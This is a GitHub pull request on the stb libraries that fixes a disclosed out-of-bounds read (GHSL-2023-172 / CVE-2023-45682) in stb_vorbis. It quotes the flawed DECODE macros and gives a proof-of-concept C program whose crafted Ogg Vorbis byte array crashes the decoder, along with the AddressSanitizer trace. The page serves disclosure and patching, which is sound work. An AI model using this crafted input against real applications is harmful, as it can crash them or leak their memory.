search

nothings / stb

stb single-file public domain libraries for C/C++
https://twitter.com/nothings
Other
25.83k stars 7.66k forks source link

Fix Wild address read in `vorbis_decode_packet_rest` (`GHSL-2023-172/CVE-2023-45682`) #1560

Closed JarLob closed 1 week ago

JarLob commented 8 months ago

A crafted file may trigger out of bounds read in DECODE macro when var is negative [1]

#define DECODE(var,f,c)                                       \
   DECODE_RAW(var,f,c)                                        \
   if (c->sparse) var = c->sorted_values[var]; // [1] OOB

As it can be seen in the definition of DECODE_RAW negative var is a valid value [2] and [3] (codebook_decode_scalar_raw may also return a negative value).

#define DECODE_RAW(var, f,c)                                  \
   if (f->valid_bits < STB_VORBIS_FAST_HUFFMAN_LENGTH)        \
      prep_huffman(f);                                        \
   var = f->acc & FAST_HUFFMAN_TABLE_MASK;                    \
   var = c->fast_huffman[var];                                \
   if (var >= 0) {                                            \
      int n = c->codeword_lengths[var];                       \
      f->acc >>= n;                                           \
      f->valid_bits -= n;                                     \
      if (f->valid_bits < 0) { f->valid_bits = 0; var = -1; } \ // [2]
   } else {                                                   \
      var = codebook_decode_scalar_raw(f,c);                  \ // [3]
   }

Impact

This issue may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Make ASAN build of the following program:
#include "../stb_vorbis.c"
#include <stdint.h>

int main(int argc, char* argv[])
{
    const uint8_t data[] = {0x4f,0x67,0x67,0x53,0x00,0x02,0x00,0x2b,0x00,0x00,0x00,0x00,0x00,0x00,0x39,0x30,0x00,0x00,
                            0x00,0x00,0x00,0x00,0xf1,0x49,0x93,0x48,0x01,0x1e,0x01,0x76,0x6f,0x72,0x62,0x69,0x73,0x00,
                            0x00,0x00,0x00,0x02,0x44,0xac,0x00,0x00,0xff,0xff,0xff,0xff,0x8f,0xb5,0x01,0x00,0xff,0xff,
                            0xff,0xff,0xb8,0x01,0x4f,0x67,0x67,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x39,0x30,0x00,0x00,0x01,0x00,0x00,0x00,0x65,0x9b,0x7d,0x94,0x0a,0x63,0xff,0xff,0xff,0xff,
                            0xff,0xff,0xff,0xff,0x3c,0x03,0x76,0x6f,0x72,0x62,0x69,0x73,0x20,0x00,0x00,0x00,0x58,0x6f,
                            0x7c,0x69,0x70,0x80,0x72,0x70,0x75,0x68,0x62,0x68,0xd4,0x75,0x6f,0x56,0x6f,0x72,0x62,0x69,
                            0x73,0x20,0x49,0x08,0x32,0x30,0x30,0x31,0x31,0x32,0x33,0x32,0x02,0x00,0x00,0x00,0x1c,0x00,
                            0x00,0x00,0x54,0x49,0x54,0x4c,0x45,0x3d,0x47,0x72,0x6f,0x6f,0x76,0x65,0x20,0x49,0x73,0x20,
                            0x49,0x6e,0x20,0x54,0x68,0x65,0xe9,0x48,0x65,0x61,0x72,0x74,0x0f,0x00,0x00,0x00,0x41,0x52,
                            0x54,0x49,0x53,0x54,0x3d,0x44,0x65,0x65,0x2d,0x6c,0x6d,0x74,0x65,0x01,0x05,0x76,0x6f,0x72,
                            0x62,0x69,0x73,0x22,0x42,0x43,0x56,0x01,0x00,0x40,0x00,0x00,0x06,0xc3,0xb2,0x2d,0x47,0xc4,
                            0x05,0x2c,0xc5,0xa3,0x6a,0x36,0x6c,0xc0,0xb4,0x01,0x00,0x00,0x00,0x10,0x1a,0xb2,0x0a,0x00,
                            0x00,0x02,0x00,0x30,0x38,0x92,0xa9,0x29,0x8e,0x29,0x5a,0x9a,0x0c,0x9a,0xa3,0xc9,0x9e,0xa4,
                            0xd9,0xa6,0x66,0x02,0xd1,0xf2,0x98,0x96,0x67,0xbb,0x9a,0x08,0xd8,0x2e,0x36,0x00,0x40,0x68,
                            0xc8,0x2a,0x00,0x00,0x10,0x00,0xc0,0x23,0x49,0x92,0x24,0x49,0x92,0x24,0x49,0x92,0x24,0x49,
                            0x96,0x64,0x49,0x96,0xa4,0x49,0x9a,0xa4,0x49,0x9a,0xa4,0x49,0x9e,0xe5,0x59,0xa2,0x25,0x5a,
                            0xa2,0x65,0x5a,0xa6,0x66,0x6a,0xaa,0xa6,0x6a,0xaa,0x27,0x7b,0xae,0xe7,0x8a,0xb2,0xe8,0x9a,
                            0xba,0xa9,0xab,0x54,0xaa,0xee,0xda,0x36,0x9b,0x6c,0xeb,0x6c,0x5b,0x07,0x9d,0x0e,0x40,0x07,
                            0x00,0x00,0x00,0x08,0x0d,0x59,0x05,0x00,0x64,0x00,0x00,0xe8,0x38,0x8e,0xe3,0x48,0x8a,0xa4,
                            0x48,0x8e,0xe4,0x48,0x92,0x64,0x59,0x96,0xa5,0x69,0x9a,0x06,0x84,0x86,0xac,0x02,0x00,0x64,
                            0x00,0x00,0x04,0x00,0x00,0x50,0x0c,0x45,0x71,0x14,0xc9,0x91,0x24,0xcf,0xf3,0x34,0xcf,0xe3,
                            0x01,0x80,0xd0,0x90,0x55,0x00,0x00,0x20,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x84,0x86,0xac,0x02,0x00,0x24,0x00,0x00,0x74,
                            0x1c,0xc7,0x71,0x24,0x45,0x72,0x1c,0xc7,0x71,0x1c,0x47,0x92,0x80,0xd0,0x90,0x55,0x00,0x80,
                            0x0c,0x00,0x80,0x00,0x00,0x14,0x45,0x71,0x1c,0xc7,0x71,0x24,0x49,0x92,0x24,0x4b,0xb2,0x2c,
                            0xcd,0xd2,0x34,0x4f,0xf3,0x34,0xd1,0x33,0x4d,0x4f,0x14,0x81,0xd0,0x90,0x55,0x00,0x00,0x20,
                            0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x2c,0x83,0xe2,0x38,0x0e,0xc7,0x91,0x1c,0x4b,0x22,
                            0x49,0x92,0x84,0x05,0x00,0x00,0xb0,0x00,0x00,0x00,0x00,0x80,0xd0,0x90,0x55,0x00,0x00,0x02,
                            0x00,0x00,0x20,0x8c,0x22,0x88,0x31,0x20,0x34,0x64,0x15,0x00,0x00,0x01,0x00,0x60,0x70,0x14,
                            0x92,0x26,0x32,0x3c,0x91,0x05,0x20,0x34,0x64,0x15,0x00,0x00,0x04,0x00,0x60,0x30,0x2c,0xa2,
                            0x24,0x32,0x35,0x11,0x68,0x8a,0x45,0x94,0x44,0xb6,0xaa,0x02,0x59,0x74,0xc9,0xa6,0x4b,0x97,
                            0x75,0x00,0x00,0x00,0x84,0x86,0xac,0x02,0x00,0x80,0x00,0x00,0x0c,0x8a,0x24,0x6b,0x8e,0x65,
                            0x8a,0x9a,0xe9,0x83,0xa5,0x68,0xbe,0x26,0x79,0x3c,0x49,0x05,0xae,0x67,0x72,0x35,0x55,0x57,
                            0x3d,0x55,0x07,0x6c,0x74,0x5b,0x06,0x00,0x42,0x43,0x56,0x01,0x00,0x20,0x00,0x00,0x07,0xb2,
                            0xce,0x20,0x34,0x64,0x15,0x00,0x00,0x08,0x00,0x20,0x00,0x00,0x00,0x40,0x51,0x1c,0xc5,0x71,
                            0x24,0x47,0x72,0x24,0xc9,0x92,0x2c,0xc9,0xb2,0x2c,0x4d,0xd3,0x3c,0x4f,0x14,0x45,0xd1,0x33,
                            0x45,0x98,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x0d,0x59,0x05,0x00,0x80,0x00,0x00,
                            0x10,0xc6,0x18,0x63,0x10,0x42,0x08,0x21,0xa4,0x90,0x42,0x0c,0x31,0xe5,0x94,0x53,0x90,0x49,
                            0x46,0x1d,0x05,0x42,0x43,0x56,0x01,0x00,0x80,0x00,0x00,0x02,0x00,0x00,0x00,0x0c,0x4b,0xb1,
                            0x14,0x4f,0xf1,0x1c,0xcf,0x51,0x1d,0x53,0x22,0xa9,0x12,0x4b,0xd5,0x78,0x34,0x1e,0x8f,0xc8,
                            0xa4,0x32,0x81,0x09,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x34,0x64,0x15,0x00,0x20,0x01,0x00,
                            0xa0,0x23,0x39,0x92,0x23,0x29,0x92,0xe2,0x28,0x8e,0x23,0x49,0x92,0x04,0x84,0x86,0xac,0x02,
                            0xff,0x64,0x00,0x00,0x04,0x00,0x60,0x38,0x8a,0xa4,0x48,0x8a,0xa5,0x68,0x8e,0x67,0x79,0x9a,
                            0x68,0x9a,0xa6,0xab,0xaa,0xaa,0x2b,0xbb,0x64,0x17,0x17,0x08,0x0d,0x59,0x05,0x00,0x00,0x02,
                            0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x42,0x43,0x56,0x01,0xff,0x12,0x00,0x00,0x3a,0x8e,0xe3,0x38,0x8e,0xe3,0x38,0x8e,0xe3,0x38,
                            0x8e,0xe4,0x48,0x40,0x68,0xc8,0x2a,0x00,0x40,0x06,0x00,0x40,0x00,0x00,0x86,0x63,0x38,0x8a,
                            0xe5,0x68,0x92,0x27,0x79,0x96,0x67,0x79,0x9a,0xa7,0x79,0x9e,0xe7,0x79,0x9e,0x28,0x9a,0xa2,
                            0x29,0x8a,0x40,0x68,0xc8,0x2a,0x00,0x00,0x10,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x8a,
                            0xa3,0x38,0x8e,0xe3,0x48,0x92,0xe4,0xb0,0x48,0x96,0x23,0x49,0x16,0x8b,0x24,0x01,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x20,0x34,0x64,0x25,0x00,0x00,0x04,0x00,0x60,0x01,0x57,0x95,0x79,0x9e,
                            0x08,0x2c,0xc7,0x32,0x41,0x93,0x2c,0x13,0x44,0x4d,0x13,0x21,0x81,0xe3,0x98,0x0a,0x28,0x8a,
                            0x27,0x7a,0x8e,0x63,0x79,0x9a,0x0c,0x84,0x86,0xac,0x08,0x00,0xe2,0x04,0x00,0x0c,0x8e,0x03,
                            0xcd,0x82,0x65,0xc1,0x75,0x01,0x8e,0x65,0x41,0xf4,0xe0,0x89,0xd0,0x65,0x80,0x63,0x59,0xf0,
                            0x44,0x88,0x1e,0x64,0x1b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xcd,0x13,0x21,
                            0x8a,0x10,0x4d,0xd8,0x32,0xc0,0x12,0x3d,0x88,0x22,0x4c,0x11,0xae,0x0d,0x00,0x00,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x80,0x25,0x7a,0x30,0x45,0x88,0x22,0x64,0x19,0x60,0x79,0x22,0x44,
                            0x13,0xa2,0x08,0x59,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x95,0x6d,0xc8,
                            0x36,0x64,0x19,0xba,0x0e,0x70,0x75,0x19,0xb2,0x0c,0x59,0x86,0xae,0x03,0x00,0x00,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x02,0x00,0x00,0x07,0xdb,0xff,0x00,0x02,0x4c,0x28,0x03,0x85,0x86,0xac,0x04,0x00,0xa2,0x00,
                            0x00,0x0c,0x8a,0x22,0x49,0x40,0x92,0x34,0x0b,0x48,0x92,0xa5,0x01,0xcf,0x13,0x45,0x80,0x29,
                            0x02,0x64,0x17,0xe0,0xba,0x00,0xdb,0x06,0x00,0x02,0x00,0x00,0x09,0xea,0x64,0xb8,0x02,0x6c,
                            0xd0,0x94,0x58,0x1c,0xa0,0xd0,0x90,0x95,0x00,0x40,0x48,0x00,0x80,0x43,0x51,0x24,0xc9,0xb2,
                            0x3c,0x0f,0x80,0xe3,0x58,0x96,0xa6,0x79,0x22,0x00,0xc7,0xb1,0x2c,0x4d,0x13,0x3d,0x00,0x9e,
                            0xe7,0x79,0xa2,0x68,0x9a,0x00,0xf0,0x3c,0x51,0x34,0x4d,0x00,0xa8,0xaa,0xaa,0xaa,0x2a,0x00,
                            0x54,0xd5,0x54,0x55,0x15,0x00,0xb2,0x2c,0xcb,0xb6,0x0c,0x00,0x64,0x59,0x96,0x01,0x80,0xae,
                            0xfb,0x3a,0x00,0xb0,0x75,0x5f,0x07,0x00,0xc2,0x30,0x1c,0x01,0x00,0x61,0x08,0x00,0x18,0x4b,
                            0x00,0xc0,0x58,0x02,0x00,0xc6,0x11,0x00,0x00,0x40,0x00,0x00,0xc0,0x81,0x03,0x00,0x40,0x80,
                            0x11,0x87,0x92,0x51,0x65,0x11,0x30,0x9a,0x70,0xe1,0x01,0x28,0x34,0x64,0x25,0x00,0x10,0x0e,
                            0x00,0x60,0x50,0x0c,0xcb,0xf2,0x3c,0x55,0x05,0xd5,0x4b,0xf3,0x3c,0xd3,0x94,0x65,0xc0,0xd3,
                            0x2c,0xcf,0x33,0x4d,0xd9,0x05,0xa8,0xae,0xaa,0xba,0xaa,0xad,0x03,0x5c,0xd3,0x75,0x65,0x59,
                            0xd7,0x01,0xb6,0xf0,0xea,0xb6,0xae,0xfb,0x00,0xb6,0xee,0xea,0xba,0x31,0x04,0x90,0x85,0x5d,
                            0x58,0x02,0x50,0x5e,0x63,0x27,0x04,0x10,0xda,0xca,0x12,0x00,0x5d,0x99,0x19,0x01,0xf0,0x29,
                            0x01,0xc0,0x26,0x04,0xc0,0x68,0x04,0x00,0x84,0x40,0x00,0x00,0xe6,0x82,0x00,0x00,0x70,0x81,
                            0xcd,0x31,0xac,0x24,0x9d,0x15,0x8e,0x06,0x17,0x1a,0xb2,0x12,0x00,0x88,0x01,0x00,0x20,0x0c,
                            0x41,0x08,0x21,0x87,0x90,0x42,0x4a,0x31,0x84,0x90,0x52,0xca,0x31,0xc6,0x18,0x63,0xce,0x39,
                            0xc6,0x18,0x83,0x10,0x3a,0xe7,0x1c,0x84,0x90,0x31,0xe7,0x04,0x00,0x00,0x0e,0x38,0x00,0x00,
                            0x04,0x98,0x98,0x98,0xc2,0x42,0x43,0x56,0x04,0x00,0x51,0x00,0x00,0x06,0x45,0x01,0x1c,0x49,
                            0x02,0x1c,0x49,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x01,0x0e,0x00,0x00,
                            0x01,0x16,0x42,0xa1,0x21,0x2b,0x01,0x80,0x28,0x00,0x00,0x83,0x62,0x48,0x8e,0x66,0x79,0x1e,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x80,0x02,0x07,0x00,0x80,0x00,0x1b,
                            0x31,0x25,0x24,0x07,0x28,0x34,0x64,0x25,0x00,0x90,0x0a,0x00,0x60,0x50,0x0c,0xcb,0x72,0x55,
                            0x40,0xb3,0x3c,0xcf,0x24,0x03,0x9a,0x27,0x89,0x1a,0x19,0x20,0x52,0xc9,0x00,0x44,0xd7,0x04,
                            0xe0,0x52,0xc9,0x00,0x64,0x26,0x00,0x00,0x00,0x19,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,
                            0x00,0x48,0xb9,0xca,0xff,0xcd,0x32,0xd9,0xb0,0x3a,0xc2,0x49,0xd1,0x58,0x60,0xa1,0x21,0x2b,
                            0x01,0x80,0x08,0x01,0x00,0x87,0xa2,0x48,0x92,0x65,0x69,0x9a,0xe6,0x79,0x9e,0xe7,0x89,0x9e,
                            0xe7,0x79,0x9e,0x28,0x6a,0x96,0xa5,0x69,0x9a,0xe7,0x79,0x9e,0x28,0x8a,0xa2,0x69,0x8a,0xa2,
                            0x28,0x8a,0xa6,0x29,0x5b,0x96,0xa6,0x79,0x9e,0xe7,0x89,0x9e,0x28,0x8a,0xa2,0x28,0x8a,0xa2,
                            0x28,0x9a,0xa6,0x2d,0x8a,0x9e,0x28,0x8a,0xa2,0x69,0x9a,0xa6,0x69,0x9a,0xa6,0x6a,0x9a,0xa6,
                            0xa9,0xaa,0xb2,0x29,0x8a,0x9e,0x28,0x9a,0xa2,0x29,0x9a,0xa6,0x69,0x9a,0xa6,0x69,0x9a,0xa6,
                            0x69,0xca,0xaa,0x2c,0x9a,0xa6,0x69,0xaa,0xa6,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,
                            0x6a,0xcb,0xb6,0x29,0xaa,0xa6,0x6a,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xba,0xaa,
                            0xad,0xdb,0xaa,0xab,0xaa,0xaa,0xab,0xaa,0xaa,0xab,0xba,0xaa,0xaa,0xaa,0xaa,0xea,0xba,0xb6,
                            0x6d,0xbb,0xa6,0x6a,0xaa,0xa6,0xab,0xba,0xae,0xea,0xba,0xae,0xaa,0xaa,0xaa,0xeb,0xda,0xb6,
                            0xed,0xca,0xa6,0xac,0xba,0xae,0xeb,0xba,0xae,0xeb,0xba,0xae,0xaa,0xba,0xae,0x2c,0xcb,0xb6,
                            0x2c,0xbb,0xa6,0xab,0xba,0xae,0xeb,0xba,0xae,0xeb,0xba,0xae,0xeb,0xba,0xae,0x6e,0xeb,0xb2,
                            0xad,0xca,0xae,0xec,0xba,0xb2,0x2b,0xcb,0xb2,0xeb,0xba,0xb2,0x2b,0xcb,0xb2,0x2c,0xcb,0x5c,
                            0xd5,0x55,0x5d,0xd7,0x75,0x5d,0xd7,0x95,0x65,0xdb,0x75,0x65,0xd9,0x96,0x6d,0xdb,0x96,0x65,
                            0xd7,0x76,0x5d,0x57,0x96,0x5d,0x59,0x96,0x5d,0xd7,0x95,0x5d,0x59,0xd7,0x6d,0x5d,0xb6,0x6d,
                            0x55,0x96,0x65,0x59,0x76,0x65,0x59,0x76,0x5d,0x59,0x96,0x6d,0xdf,0xb6,0x65,0xdb,0x76,0x65,
                            0x59,0x96,0x6d,0x59,0x96,0x65,0x59,0x96,0x5d,0x59,0xf6,0x75,0xd9,0xd6,0x6d,0x5b,0x76,0x65,
                            0x57,0x76,0x65,0x59,0x96,0x65,0x57,0xb6,0x65,0x59,0xb7,0x65,0xdb,0xb6,0x6d,0x5d,0x76,0x6d,
                            0x57,0xb6,0x65,0x5b,0x96,0x65,0x57,0x96,0x65,0x5b,0xb6,0x6d,0xdb,0xb6,0x6d,0x5b,0x96,0x6d,
                            0x59,0x76,0x65,0x5d,0x96,0x65,0xd9,0xb6,0x6d,0xdf,0xb6,0x6d,0xdf,0xd6,0x6d,0x5b,0x96,0x5d,
                            0x59,0x96,0x65,0x59,0x96,0x6d,0xdb,0xb6,0x6d,0x5b,0xd6,0x6d,0xdb,0xb6,0x75,0xd9,0x96,0x5d,
                            0xd9,0x96,0x6d,0x59,0x96,0x6d,0x5b,0xb7,0x75,0x5d,0xb7,0x6d,0xdb,0xb7,0x75,0x59,0x97,0x5d,
                            0xdb,0xb6,0x6d,0x59,0xd6,0x75,0x9b,0x6e,0xeb,0xba,0xed,0xd3,0x75,0x5b,0x96,0x65,0x5b,0x96,
                            0x6d,0x5d,0xb6,0x75,0x01,0x00,0x08,0x0b,0x0e,0x00,0x80,0x83,0x46,0x96,0x62,0xa9,0x21,0x77,
                            0x9e,0x81,0x25,0x12,0x33,0xa6,0xa0,0xa1,0x02,0x2b,0x34,0x64,0x45,0x00,0x10,0x05,0x00,0xc0,
                            0x20,0xc4,0x94,0x62,0x4a,0x21,0x84,0x98,0x52,0x4c,0x31,0x84,0x10,0x53,0x8a,0x29,0xc5,0x18,
                            0x63,0x8c,0x31,0xc6,0x18,0x63,0x8c,0x31,0xc6,0x98,0x52,0x8c,0x31,0xc6,0x18,0x63,0x8c,0x31,
                            0xc6,0x18,0x63,0x4a,0x29,0xc6,0x18,0x63,0x8c,0x31,0xc6,0x18,0x63,0x8c,0x09,0x00,0x00,0x07,
                            0x70,0x00,0x00,0x08,0xb0,0x10,0x0a,0x0d,0x59,0x09,0x00,0x00,0x01,0x00,0x58,0x4c,0xd7,0xf6,
                            0x35,0xd1,0x17,0x15,0xc7,0xf2,0x24,0xcf,0x77,0x1d,0x47,0xd2,0x3c,0x51,0xb8,0x2d,0x49,0xb2,
                            0x5c,0x97,0xef,0x59,0x92,0xa3,0xeb,0xa2,0x06,0x8a,0x64,0x7b,0x20,0x49,0xb2,0x2f,0xec,0xb2,
                            0x26,0xbb,0x26,0x00,0x00,0x00,0x82,0x00,0x00,0x03,0x11,0x21,0x31,0x06,0x24,0x02,0x00,0x41,
                            0x81,0x81,0x0c,0x00,0x31,0x40,0x48,0xe8,0x0c,0x11,0x8f,0x4e,0xe8,0xdf,0x2c,0xf9,0x71,0xf4,
                            0xd7,0x9b,0xc1,0xc5,0xa8,0x1a,0x73,0x00,0x80,0x82,0x10,0x11,0x91,0x99,0x51,0x10,0x1a,0x0f,
                            0x4b,0x43,0x22,0x42,0x6e,0x00,0x48,0x4c,0x50,0x48,0x06,0x8b,0x0f,0x80,0x8b,0x14,0xcb,0xc2,
                            0x27,0x71,0xc0,0xda,0xba,0x88,0xde,0x04,0xe2,0x1c,0x31,0xff,0xc8,0xd3,0x5b,0x1e,0x90,0x00,
                            0x05,0x40,0x88,0x63,0x80,0x02,0xc2,0x8d,0xda,0x9a,0x65,0xfe,0x37,0x1a,0xf3,0xd4,0x14,0x73,
                            0x0f,0x00,0x00,0x04,0x00,0x00,0xa0,0x9a,0x1e,0x00,0x00,0x00,0x8e,0x0d,0x20,0xa2,0x21,0x3a,
                            0x8c,0x0c,0x8d,0x0d,0x8e,0x10,0x90,0x8f,0x0e,0x0e,0x00,0x00,0x01,0x00,0x00,0x03,0x40,0x87,
                            0xf0,0x00,0x80,0x43,0x04,0x88,0x68,0x88,0x0e,0x23,0x43,0x63,0x83,0xa3,0xc3,0xe3,0x03,0x24,
                            0x24,0x00,0x00,0x10,0x40,0x00,0x02,0x00,0x00,0x00,0x04,0x10,0x80,0x80,0x80,0x00,0x00,0x00,
                            0x00,0x00,0x40,0x00,0x00,0x00,0x80,0x80,0x4f,0x67,0x67,0x53,0x00,0x00,0xc0,0x2e,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x39,0x30,0x00,0x00,0x02,0x00,0x73,0xdc,0x00,0xcd,0x27,0x00,0x05,0x01,
                            0x0d,0x01,0x00,0x00,0x03,0x66,0xba,0x01,0x1e,0x38,0x89,0x8d,0x06,0xfc,0x00,0xd1,0x00,0x2e,
                            0xb3};
    size_t size = sizeof(data);

    int chan, samplerate;
    short *output;
    int samples = stb_vorbis_decode_memory(data, size, &chan, &samplerate, &output);
    if (samples >= 0)
        free(output);
    return 0;
}
  1. Run the program to hit the error.
AddressSanitizer:DEADLYSIGNAL
=================================================================
==241158==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000005001e0 bp 0x7ffc7060a860 sp 0x7ffc70608e40 T0)
==241158==The signal is caused by a READ memory access.
    #0 0x5001e0 in vorbis_decode_packet_rest(stb_vorbis*, int*, Mode*, int, int, int, int, int*) tests/../stb_vorbis.c:3231:22
    #1 0x4e1480 in vorbis_decode_packet(stb_vorbis*, int*, int*, int*) tests/../stb_vorbis.c:3453:11
    #2 0x4f4628 in vorbis_pump_first_frame(stb_vorbis*) tests/../stb_vorbis.c:3512:10
    #3 0x4f94b6 in stb_vorbis_open_memory tests/../stb_vorbis.c:5116:10
    #4 0x4fbfb1 in stb_vorbis_decode_memory tests/../stb_vorbis.c:5390:20